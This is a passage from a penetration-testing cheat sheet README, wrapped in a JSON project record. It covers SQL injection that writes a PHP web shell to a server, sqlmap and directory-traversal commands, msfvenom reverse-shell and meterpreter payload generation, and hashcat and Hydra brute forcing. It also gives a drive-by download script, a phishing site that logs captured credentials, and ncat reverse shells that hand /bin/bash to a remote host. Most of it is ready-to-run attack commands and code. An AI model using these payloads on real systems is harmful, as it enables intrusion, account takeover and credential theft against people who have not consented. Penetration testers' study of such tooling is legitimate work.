shell_exec($_GET[\"command\"]);} ?\u003e' INTO DUMPFILE '..\\\\..\\\\htdocs\\\\backdoor.php'-- \n\n' UNION SELECT '', '', '', '\u003c?php $p=\"command\";$o=null;if(isset($_SERVER[\"REQUEST_METHOD\"])\u0026\u0026strtolower($_SERVER[\"REQUEST_METHOD\"])===\"get\"\u0026\u0026isset($_GET[$p])\u0026\u0026($_GET[$p]=trim($_GET[$p]))\u0026\u0026strlen($_GET[$p])\u003e0){$o=@shell_exec(\"($_GET[$p]) 2\u003e\u00261\");if($o===false){$o=\"ERROR: The function might be disabled.\";}else{$o=str_replace(\"\u003c\",\"\u0026lt;\",$o);$o=str_replace(\"\u003e\",\"\u0026gt;\",$o);}} ?\u003e\u003c!DOCTYPE html\u003e\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003cmeta charset=\"UTF-8\"\u003e\u003ctitle\u003eSimple PHP Web Shell\u003c/title\u003e\u003cmeta name=\"author\" content=\"Ivan Šincek\"\u003e\u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"\u003e\u003c/head\u003e\u003cbody\u003e\u003cpre\u003e\u003c?php echo $o;unset($o);unset($_GET[$p]); ?\u003e\u003c/pre\u003e\u003c/body\u003e\u003c/html\u003e' INTO DUMPFILE '..\\\\..\\\\htdocs\\\\backdoor.php'-- \n```\n\n**To successfully inject a web shell, the current database user must have a write permission.**\n\n### sqlmap\n\nInject SQL code into request parameters:\n\n```fundamental\nsqlmap -a -u somesite.com/index.php?username=test\u0026password=test\n\nsqlmap -a -u somesite.com/index.php --data username=test\u0026password=test\n\nsqlmap -a -u somesite.com/index.php --data username=test\u0026password=test -p password\n```\n\n| Option | Description |\n| --- | --- |\n| -u | Target URL |\n| -H | Extra HTTP header |\n| --data | Data string to be sent through POST |\n| --cookie | HTTP Cookie header value |\n| --proxy | Use a proxy to connect to the target URL (\\[protocol://\\]host\\[:port\\]) |\n| -p | Testable parameter(s) |\n| --level | Level of tests to perform (1-5, default: 1) |\n| --risk | Risk of tests to perform (1-3, default: 1) |\n| -a | Retrieve everything |\n| -b | Retrieve DBMS banner |\n| --dump-all | Dump all DBMS databases tables entries |\n| --os-shell | Prompt for an interactive operating system shell |\n| --os-pwn | Prompt for an OOB shell, Meterpreter, or VNC |\n| --sqlmap-shell | Prompt for an interactive sqlmap shell |\n| --wizard | Simple wizard interface for beginner users |\n| --dbms | To do. |\n\n### dotdotpwn\n\nTraverse a path (e.g., `somesite.com/../../../etc/passwd`):\n\n```fundamental\ndotdotpwn -q -m http -S -o windows -f /windows/win.ini -k mci -h somesite.com\n\ndotdotpwn -q -m http -o unix -f /etc/passwd -k root -h somesite.com\n\ndotdotpwn -q -m http-url -o unix -f /etc/hosts -k localhost -u 'https://somesite.com/index.php?file=TRAVERSAL'\n```\n\nTry to prepend a protocol such as `file://`, `gopher://`, `dict://`, `php://`, `jar://`, `ftp://`, `tftp://`, etc., to the file path; e.g, `file://TRAVERSAL`.\n\nCheck some additional directory traversal tips at [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/README.md). Credits to the author!\n\n| Option | Description |\n| --- | --- |\n| -m | Module (http, http-url, ftp, tftp payload, stdout) |\n| -h | Hostname |\n| -O | Operating System detection for intelligent fuzzing (nmap) |\n| -o | Operating System type if known (\"windows\", \"unix\", or \"generic\") |\n| -d | Depth of traversals (default: 6) |\n| -f | Specific filename (default: according to OS detected) |\n| -S | Use SSL for HTTP and Payload module (not needed for http-url) |\n| -u | URL with the part to be fuzzed marked as TRAVERSAL |\n| -k | Text pattern to match in the response |\n| -p | Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword |\n| -x | Port to connect (default: HTTP=80; FTP=21; TFTP=69) |\n| -U | Username (default: 'anonymous') |\n| -P | Password (default: 'dot(at)dot.pwn') |\n| -M | HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET) |\n| -b | Break after the first vulnerability is found |\n| -C | Continue if no data was received from host |\n\n### Web Shells\n\nFind out more about PHP shells at [ivan-sincek/php-reverse-shell](https://github.com/ivan-sincek/php-reverse-shell).\n\nFind out more about Java/JSP shells at [ivan-sincek/java-reverse-tcp](https://github.com/ivan-sincek/java-reverse-tcp).\n\n### Send a Payload With Python\n\nFind out how to generate a reverse shell payload for Python and send it to the target machine at [ivan-sincek/send-tcp-payload](https://github.com/ivan-sincek/send-tcp-payload).\n\n## 4. Post Exploitation\n\n### 4.1 Useful Websites\n\n* [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n* [lolbas-project.github.io](https://lolbas-project.github.io)\n* [gtfobins.github.io](https://gtfobins.github.io)\n\n### Generate a Reverse Shell Payload for Windows OS\n\nTo generate a `Base64 encoded payload`, use one of the following MSFvenom commands, modify them to your need:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \\x00\\x0a\\x0d\\xff | base64 -w 0 \u003e payload.txt\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \\x00\\x0a\\x0d\\xff | base64 -w 0 \u003e payload.txt\n\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 \u003e payload.txt\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 \u003e payload.txt\n```\n\nTo generate a `binary file`, use one of the following MSFvenom commands, modify them to your need:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \\x00\\x0a\\x0d\\xff -o payload.bin\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \\x00\\x0a\\x0d\\xff -o payload.bin\n\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin\n```\n\nTo generate a `DLL file`, use one of the following MSFvenom commands, modify them to your need:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f dll -b \\x00\\x0a\\x0d\\xff -o payload.dll\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f dll -b \\x00\\x0a\\x0d\\xff -o payload.dll\n```\n\nTo generate a `standalone executable`, file use one of the following MSFvenom commands, modify them to your need:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -b \\x00\\x0a\\x0d\\xff -o payload.exe\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -b \\x00\\x0a\\x0d\\xff -o payload.exe\n\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe\n```\n\nTo generate an `MSI file`, use one of the following MSFvenom commands, modify them to your need:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f msi -b \\x00\\x0a\\x0d\\xff -o payload.msi\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f msi -b \\x00\\x0a\\x0d\\xff -o payload.msi\n```\n\nBytecode might not work on the first try due to some other bad characters. Trial and error is the key.\n\nSo far there is no easy way to generate a DLL nor MSI file with a stageless meterpreter shell due to the size issues.\n\n### PowerShell Encoded Command\n\nTo generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:\n\n```pwsh\n[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))\n```\n\nTo run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command\n```\n\nTo decode a PowerShell encoded command, run the following PowerShell command:\n\n```pwsh\n[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))\n```\n\nFind out more about PowerShell reverse and bind TCP shells at [ivan-sincek/powershell-reverse-tcp](https://github.com/ivan-sincek/powershell-reverse-tcp).\n\n## 5. Password Cracking\n\n**Google a hash before trying to crack it because you might save yourself a lot of time and trouble.**\n\nUse [Google Dorks](#google-dorks), [Chad](#chad), or [FOCA](#foca) to find and download files, and within the files' metadata, domain usernames to brute force.\n\n**Keep in mind that you might lockout people's accounts.**\n\nSome web forms have CAPTCHA challenge and/or hidden submission token which may prevent you from brute forcing. If that is the case, try to submit a request without the CAPTCHA challenge response and submission token.\n\nYou can find a bunch of useful wordlists in [SecLists](#wordlists).\n\n### 5.1 Useful Websites\n\n* [gchq.github.io/CyberChef](https://gchq.github.io/CyberChef)\n* [onlinehashcrack.com](https://www.onlinehashcrack.com)\n* [hashkiller.io/listmanager](https://hashkiller.io/listmanager) - has many other tools\n* [hashes.com/en/decrypt/hash](https://hashes.com/en/decrypt/hash) - has many other tools\n* [crackstation.net](https://crackstation.net)\n* [weakpass.com/wordlist](https://weakpass.com/wordlist) - lots of password dumps\n* [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists)\n\n### crunch\n\nGenerate a lower-alpha-numeric wordlist:\n\n```fundamental\ncrunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt\n```\n\nSee the list of all available charsets or add your own in `charset.lst` located at `/usr/share/crunch/` directory.\n\nGenerate all the possible permutations from words:\n\n```fundamental\ncrunch -o crunch_wordlist.txt -p admin 123 \\!\\\"\n\ncrunch -o crunch_wordlist.txt -q words.txt\n```\n\nGenerate all the possible combinations from a charset:\n\n```fundamental\ncrunch 4 6 -o crunch_wordlist.txt -p admin123\\!\\\"\n```\n\n| Option | Description |\n| --- | --- |\n| -d | Limits the number of consecutive characters |\n| -f | Specifies a character set from a file |\n| -i | Inverts the output |\n| -l | When you use the -t option this option tells crunch which symbols should be treated as literals |\n| -o | Specifies the file to write the output to |\n| -p | Tells crunch to generate/permute words that don't have repeating characters |\n| -q | Tells crunch to read a file and permute what is read |\n| -r | Tells crunch to resume generate words from where it left off, -r only works if you use -o |\n| -s | Specifies a starting string |\n| -t | Specifies a pattern |\n\n| Placeholder | Description |\n| --- | --- |\n| \\@ | Lower case characters |\n| \\, | Upper case characters |\n| \\% | Numbers |\n| \\^ | Symbols |\n\n**Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.**\n\nGenerate all the possible combinations from a placeholder:\n\n```fundamental\ncrunch 10 10 -o crunch_wordlist.txt -t admin%%%^^\n\ncrunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^\n\ncrunch 10 10 + + 123456 \\!\\\" -o crunch_wordlist.txt -t admin@@%^^\n\ncrunch 10 10 -o crunch_wordlist.txt -t @dmin@@%^^ -l @aaaaaaaaa\n```\n\n### hash-identifier\n\nTo identify a hash type, run the following tool:\n\n```fundamental\nhash-identifier\n```\n\n### Hashcat\n\nBrute force MD5 hashes:\n\n```fundamental\nhashcat -m 0 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt\n```\n\nBrute force NetNTLMv1 hashes:\n\n```fundamental\nhashcat -m 5500 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt\n```\n\nUse `--session=\u003csession_name\u003e` to save, and continue your cracking progress later using `--restore`.\n\nContinue cracking progress:\n\n```fundamental\nhashcat --session=cracking --restore\n```\n\n| Option | Description |\n| --- | --- |\n| -m | Hash-type, see references below |\n| -a | Attack-mode, see references below |\n| --force | Ignore warnings |\n| --runtime | Abort session after X seconds of runtime |\n| --status | Enable automatic update of the status screen |\n| -o | Define outfile for recovered hash |\n| --show | Show cracked passwords found in potfile |\n| --session | Define specific session name |\n| --restore | Restore session from --session |\n| --restore-file-path | Specific path to restore file |\n| -O | Enable optimized kernels (limits password length) |\n| -1 | User-defined charset ?1 |\n| -2 | User-defined charset ?2 |\n| -3 | User-defined charset ?3 |\n| -4 | User-defined charset ?4 |\n\n**When specifying a user-defined charset, escape `?` with another `?` (i.e., use `??` instead of `\\?`).**\n\n| Hash Type | Description |\n| --- | --- |\n| 0 | MD5 |\n| 100 | SHA1 |\n| 1400 | SHA256 |\n| 1700 | SHA512 |\n| 200  | MySQL323 |\n| 300  | MySQL4.1/MySQL5 |\n| 1000 | NTLM |\n| 5500 | NetNTLMv1-VANILLA / NetNTLMv1-ESS |\n| 5600 | NetNTLMv2 |\n| 2500 | WPA/WPA2 |\n| 16800 | WPA-PMKID-PBKDF2 |\n| 16500 | JWT (JSON Web Token) |\n\nFor more hash types read the manual.\n\n| Attack Mode | Name |\n| --- | --- |\n| 0 | Straight |\n| 1 | Combination |\n| 3 | Brute Force |\n| 6 | Hybrid Wordlist + Mask |\n| 7 | Hybrid Mask + Wordlist |\n| 9 | Association |\n\n| Charset | Description |\n| --- | --- |\n| \\?l | abcdefghijklmnopqrstuvwxyz |\n| \\?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ |\n| \\?d | 0123456789 |\n| \\?s | \\!\\\"\\#\\$\\%\\\u0026\\'\\(\\)\\*\\+\\,\\-\\.\\/\\:\\;\\\u003c\\=\\\u003e\\?\\@\\[\\]\\^\\_\\`\\{\\|\\}\\~ |\n| \\?a | \\?l\\?u\\?d\\?s |\n| \\?b | 0x00 - 0xff |\n\nDictionary attack:\n\n```fundamental\nhashcat -m 100 -a 0 --session=cracking --force --status -O B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt\n\nhashcat -m 5600 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt\n```\n\nYou can find `rockyou.txt` wordlist in [SecLists](#wordlists).\n\nBrute force a hash using a placeholder:\n\n```fundamental\nhashcat -m 0 -a 3 --session=cracking --force --status -O cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2\n\nhashcat -m 0 -a 3 --session=cracking --force --status -O 85fb9a30572c42b19f36d215722e1780 -1 \\!\\\"\\#\\$\\%\\\u0026\\/\\(\\)\\=??\\* -2 ?d?1 ?u?l?l?l?l?2?2?2\n```\n\n### Cracking the JWT\n\nDictionary attack:\n\n```fundamental\nhashcat -m 16500 -a 3 --session=cracking --force --status -O eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds\n```\n\nYou can also check my JWT cracking tool at [ivan-sincek/jwt-bf](https://github.com/ivan-sincek/jwt-bf).\n\n### Hydra\n\nI prefer to use Burp Suite to brute force web forms, and Hydra for other services.\n\nDictionary attack on an HTTP POST login web form:\n\n```fundamental\nhydra -o hydra_results.txt -l admin -P rockyou.txt somesite.com http-post-form '/login.php:username=^USER^\u0026password=^PASS^\u0026Login=Login:Login failed!'\n```\n\nWhen brute forcing a login web form, you must specify `Login=Login:\u003cexpected_message\u003e` to distinguish between the successful and failed login attempts. Change the `username` and `password` request parameter names as necessary.\n\nDictionary attack on a Secure Shell (SSH) login:\n\n```fundamental\nhydra -o hydra_results.txt -L users.txt -P rockyou.txt 192.168.8.5 ssh\n```\n\nYou can find a bunch of useful wordlists in [SecLists](#wordlists).\n\n| Option | Description |\n| --- | --- |\n| -R | Restore a previous aborted/crashed session |\n| -S | Perform an SSL connect |\n| -O | Use old SSL v2 and v3 |\n| -s | If the service is on a different default port, define it here |\n| -l | Login with a login name |\n| -L | Load several logins from a file |\n| -p | Login with a password |\n| -P | Load several passwords from a file |\n| -x | Password brute force generation (MIN:MAX:CHARSET), type \"-x -h\" to get help |\n| -y | Disable use of symbols in bruteforce |\n| -e | Try \"n\" null password, \"s\" login as pass and/or \"r\" reversed login |\n| -o | Write found login/password pairs to a file instead of stdout |\n| -f/-F | Exit when a login/pass pair is found (-f per host, -F global) |\n| -M | List of servers to attack, one entry per line, ':' to specify port |\n\n| Supported Services |\n| --- |\n| ftp\\[s\\] |\n| http\\[s\\]\\-\\{get\\|post\\}\\-form |\n| mysql |\n| smb |\n| smtp\\[s\\] |\n| snmp |\n| ssh |\n| telnet\\[s\\] |\n| vnc |\n\nFor more supported services read the manual.\n\n| Brute Force Syntax | Description |\n| --- | --- |\n| MIN | Minimum number of characters in the password |\n| MAX | Maximum number of characters in the password |\n| CHARSET | Charset values are: \"a\" for lowercase letters, \"A\" for uppercase letters, \"1\" for numbers, and for all others, just add their real representation |\n\nBrute force attack on FTP:\n\n```fundamental\nhydra -o hydra_results.txt -l admin -x 4:4:aA1\\!\\\"\\#\\$\\% 192.168.8.5 ftp\n```\n\n### Password Spraying\n\nAfter you have collected enough usernames from the [reconnaissance phase](#1-reconnaissance), it is time to try and brute force some of them.\n\nFind out how to generate a good password spraying wordlist at [ivan-sincek/wordlist-extender](https://github.com/ivan-sincek/wordlist-extender), but first you will need a few good keywords that describe your target.\n\nSuch keywords can include a company name, abbreviations, or words that describe the company's services, products, etc.\n\nAfter you generated the wordlist, use it with tools such as [Hydra](#hydra), [Burp Suite Intruder](https://portswigger.net/burp/documentation/desktop/tools/intruder), etc., to brute force login web forms. Hydra can attack authentication mechanisms for all kinds of services and ports.\n\nIf strong password policy is enforced, lazy passwords usually start with one capitalized word followed by a few digits and one special character at the end (e.g., Password123!).\n\nYou can also use the generated wordlist with [hashcat](#hashcat), e.g., to crack NTLMv2 hashes that you have collected using LLMNR responder during a network penetration testing, etc.\n\n## 6. Social Engineering\n\nFind out how to embed a PowerShell script into an MS Word document at [ivan-sincek/powershell-reverse-tcp](https://github.com/ivan-sincek/powershell-reverse-tcp#ms-word).\n\n### Drive-by Download\n\nTo force users to download a malicious file, copy and paste this JavaScript code block on any cloned web page:\n\n```javascript\nfunction download(url, type, name, method) {\n\tvar req = new XMLHttpRequest();\n\treq.open(method, url, true);\n\treq.responseType = 'blob';\n\treq.onload = function() {\n\t\tvar blob = new Blob([req.response], { type: type })\n\t\tvar isIE = false || !!document.documentMode;\n\t\tif (isIE) {\n\t\t\t// IE doesn't allow using a blob object directly as link\n\t\t\t// instead it is necessary to use msSaveOrOpenBlob()\n\t\t\tif (window.navigator \u0026\u0026 window.navigator.msSaveOrOpenBlob) {\n\t\t\t\twindow.navigator.msSaveOrOpenBlob(blob, name);\n\t\t\t}\n\t\t} else {\n\t\t\tvar anchor = document.createElement('a');\n\t\t\tanchor.href = window.URL.createObjectURL(blob);\n\t\t\tanchor.download = name;\n\t\t\tanchor.click();\n\t\t\t// in Firefox it is necessary to delay revoking the ObjectURL\n\t\t\tsetTimeout(function() {\n\t\t\t\twindow.URL.revokeObjectURL(anchor);\n\t\t\t\tanchor.remove();\n\t\t\t}, 250);\n\t\t}\n\t};\n\treq.send();\n}\n// specify your file here, use only an absolute URL\ndownload('http://localhost/files/pentest.pdf', 'application/pdf', 'pentest.pdf', 'GET');\n// download('http://localhost/files/pentest.docx', 'plain/txt', 'pentest.docx', 'GET');\n```\n\nTo try it out, copy all the content from [\\\\social_engineering\\\\driveby_download\\\\](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/tree/master/social_engineering/driveby_download) to your server's web root directory (e.g., to \\\\xampp\\\\htdocs\\\\ on XAMPP), and navigate to the web page with your preferred web browser.\n\n### Phishing Website\n\nTo try it out, copy all the content from [\\\\social_engineering\\\\phishing_website\\\\](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/tree/master/social_engineering/phishing_website) to your server's web root directory (e.g., to \\xampp\\htdocs\\ on XAMPP), and navigate to the web page with your preferred web browser.\n\nCaptured credentials will be stored in [\\\\social_engineering\\\\phishing_website\\\\logs\\\\credentials.log](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/tree/master/social_engineering/phishing_website/logs).\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/img/phishing_website.jpg\" alt=\"Phishing Website\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 2 - Phishing Website\u003c/p\u003e\n\nRead the comments in [\\\\social_engineering\\\\phishing_website\\\\index.php](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/social_engineering/phishing_website/index.php) to get a better understanding on how all of it works.\n\nYou can modify and expand this template to your liking. You have everything that needs to get you started.\n\nYou can easily customize [CSS](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/social_engineering/phishing_website/css/main.css) to make it look more like the company you are testing, e.g., change colors, logo, etc.\n\nCheck the standalone redirect templates in [\\\\social_engineering\\\\phishing_website\\\\redirects\\\\](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/social_engineering/phishing_website/redirects) directory.\n\nUse SingleFile ([Chrome](https://chrome.google.com/webstore/detail/singlefile/mpiodijhokgodhhofbcjdecpffjipkle))([FireFox](https://addons.mozilla.org/hr/firefox/addon/single-file)) browser extension to download a web page as a single HTML file, then, rename the file to `index.php`.\n\n## 7. Miscellaneous\n\nHere you can find a bunch of random stuff.\n\n### 7.1 Useful Websites\n\n* [jsonlint.com](https://jsonlint.com)\n* [base64decode.org](https://www.base64decode.org)\n* [urldecoder.org](https://www.urldecoder.org)\n* [bitly.com](https://bitly.com) - URL shortener\n* [getcreditcardnumbers.com](https://www.getcreditcardnumbers.com) - dummy credit card info\n\n### cURL\n\nDownload a file:\n\n```fundamental\ncurl somesite.com/somefile.txt -o somefile.txt\n```\n\nUpload a file:\n\n```fundamental\ncurl somesite.com/uploads/ -T somefile.txt\n```\n\n| Option | Description |\n| --- | --- |\n| -d | Sends the specified data in a POST request to the HTTP server |\n| -H | Extra header to include in the request when sending HTTP to a server |\n| -i | Include the HTTP response headers in the output |\n| -k | Proceed and operate server connections otherwise considered insecure |\n| -o | Write to file instead of stdout |\n| -T | Transfers the specified local file to the remote URL, same as PUT method |\n| -v | Make the operation more talkative |\n| -x | Use the specified proxy (\\[protocol://\\]host\\[:port\\]) |\n| -X | Specifies a custom request method to use when communicating with the HTTP server |\n\nFind out how to test a web server for various HTTP methods and method overrides at [ivan-sincek/forbidden](https://github.com/ivan-sincek/forbidden).\n\n### Ncat\n\n\\[Server\\] Set up a listener:\n\n```fundamental\nncat -nvlp 9000\n\nncat -nvlp 9000 \u003e received_data.txt\n\nncat -nvlp 9000 -e /bin/bash\n\nncat -nvlp 9000 -e /bin/bash --ssl\n\nncat -nvlp 9000 --ssl-cert crt.pem --ssl-key key.pem\n\nncat -nvlp 9000 --keep-open \u003c\u003c\u003c \"HTTP/1.1 200 OK\\r\\n\\r\\n\"\n```\n\n\\[Client\\] Connect to a remote host:\n\n```fundamental\nncat -nv 192.168.8.5 9000\n\nncat -nv 192.168.8.5 9000 \u003c sent_data.txt\n\nncat -nv 192.168.8.5 9000 -e /bin/bash\n\nncat -nv 192.168.8.5 9000 -e /bin/bash --ssl\n\nncat -nv 192.168.8.5 9000 --ssl-cert crt.pem --ssl-key key.pem\n```\n\nFind out how to create an SSL/TLS certificate at [ivan-sincek/secure-website](https://github.com/ivan-sincek/secure-website/tree/master/crt).\n\nCheck if connection to a specified TCP port (e.g., port 22 or 23) is possible:\n\n```bash\nfor i in {0..255}; do ncat -nv \"192.168.8.${i}\" 9000 -w 2 -z 2\u003e\u00261 | grep -Po '(?\u003c=Connected\\ to\\ )[^\\s]+(?=\\.)'; done\n\nfor ip in $(cat ips.txt); do ncat -nv \"${ip}\" 9000 -w 2 -z 2\u003e\u00261 | grep -Po '(?\u003c=Connected\\ to\\ )[^\\s]+(?=\\.)'; done\n```\n\n### multi/handler\n\nSet up a listener (change the PAYLOAD, LHOST, and LPORT as necessary):\n\n```fundamental\nmsfconsole -q\n\nuse exploit/multi/handler\n\nset PAYLOAD windows/shell_reverse_tcp\n\nset LHOST 192.168.8.185\n\nset LPORT 9000\n\nexploit\n```\n\n### ngrok\n\nUse [ngrok](https://ngrok.com/download) to give your local web server a public address, but do not expose the web server for too long if it is not properly hardened due to security concerns.\n\nI advise you not to transfer any sensitive data over it, just in case.\n\n### Additional References\n\nCredits to the authors!\n\n* [book.hacktricks.xyz](https://book.hacktricks.xyz/welcome/readme)\n* [infosecmatter.com/bug-bounty-tips](https://www.infosecmatter.com/bug-bounty-tips)\n* [pentestbook.six2dez.com](https://pentestbook.six2dez.com)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fpenetration-testing-cheat-sheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fpenetration-testing-cheat-sheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fpenetration-testing-cheat-sheet/lists"}